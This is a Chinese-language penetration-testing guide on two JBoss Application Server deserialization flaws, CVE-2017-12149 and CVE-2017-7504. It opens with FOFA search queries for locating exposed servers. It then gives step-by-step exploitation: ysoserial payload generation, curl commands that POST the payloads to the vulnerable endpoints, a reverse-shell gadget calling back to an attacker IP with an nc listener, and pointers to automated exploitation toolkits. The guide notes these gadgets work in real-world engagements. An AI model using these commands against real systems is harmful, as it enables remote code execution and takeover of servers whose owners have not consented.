Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。
Web特征
其默认页在8080端口(可变),welcome界面:
该产品存在标签页icon图标:
在欢迎界面可以看到有管理接口的相关入口:
进入后经过身份验证后即可进入管理界面。
fofa语法:title="Welcome to JBoss AS"、title="Welcome to JBoss AS" && port="8080"
漏洞复现
CVE-2017-12149(反序列化)
此漏洞由于HttpInvoker组件中的ReadOnlyAccessFilter过滤器在未进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
主要问题出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:
影响范围:JBoss AS 5.x、JBoss AS 6.x
复现示例
**这里使用常规Java反序列化漏洞测试方法来复现该漏洞。*
此漏洞利用有两种方法:
法一:手工构造命令
1、编写并处理反弹shell的命令
反弹shell需要使用bash,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,所以需要用进行一次编码。
工具:runtime-exec-payloads
2、序列化数据生成恶意文件
使用ysoserial来复现生成序列化数据,由于目标使用的Java版本较新,所以选择使用的gadget是CommonsCollections5(CC5):
PS:实战时由于适用范围广所以CC5\CC6均可尝试。
java -jar ysoserial.jar CommonsCollections5 "<上一步编码后的指令>" > poc.ser
3、发送POC
生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:
PS:数据包中Content-Type要改成:application/data,并在下方空白处选择“从文件粘贴”。
可以通过bp也可以通过curl命令,这里使用curl成功,bp由于未知原因失败了:
curl -X POST http://target-ip:8080/invoker/readonly -H "Content-Type: application/x-java-serialized-object" --data-binary "@poc.ser"
法二:通过自动化利用工具
工具1:集成天狐渗透工具箱-社区版V2.0纪念版/JBoss漏洞检测利用工具
工具2:JBoss-CVE-2017-12149检测利用工具
CVE-2017-7504(JBossMQ JMS 反序列化)
在JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
影响范围:JBoss 4.x
复现示例
此漏洞依然是两种方法进行复现:
法一:手工命令
*注意要使用java8
通过借助JavaDeserH2HC生成的POC来复现。生成Payload:
javac8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
设置接收shell的ip和端口:
java8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口
开启监听:
nc -lvvp 监听端口
因为此漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,所以将payload发送到该接口(在poc目录下执行):
curl http://target-IP:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
法二:自动化工具
工具:集成天狐渗透工具箱-社区版V2.0纪念版/JBoss漏洞检测利用工具
